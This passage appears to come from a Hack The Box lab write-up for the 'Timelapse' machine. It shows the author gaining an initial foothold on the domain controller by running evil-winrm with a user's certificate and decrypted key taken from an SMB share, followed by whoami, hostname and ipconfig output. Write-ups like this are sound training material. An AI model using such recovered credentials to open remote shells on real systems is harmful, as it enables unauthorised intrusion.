WinRM
Among many things that can be performed by leveraging a valid domain certificate and key, one of them is authenticating to the WinRM server
The target system indeed hosts a WinRM server over SSL on the port 5986 that would accept the certificate and key file for authentication
As suspected earlier, the PFX file appears to belong to the the legacyy user.
Although it’s not definitively clear whether the user legacyy belongs to the Remote Management Users Group, it is reasonable to assume that this is the case, primarily because the term “WinRM” is explicitly mentioned in the backup archive’s filename. This implies a potential association between the user and the group, allowing a PowerShell session over WinRM.
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ evil-winrm -i dc01.timelapse.htb -P 5986 -S -c smb/Dev/legacyy_dev_auth.public -k smb/Dev/legacyy_dev_auth.private.decrypted
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
warning: SSL enabled
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\legacyy\Documents> whoami
timelapse\legacyy
*evil-winrm* ps c:\Users\legacyy\Documents> hostname
dc01
*evil-winrm* ps c:\Users\legacyy\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::245
ipv6 address. . . . . . . . . . . : dead:beef::cc93:dbe2:8401:964
link-local ipv6 address . . . . . : fe80::cc93:dbe2:8401:964%13
ipv4 address. . . . . . . . . . . : 10.10.11.152
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%13
10.10.10.2Initial Foothold established to the target system as the legacyy user via WinRM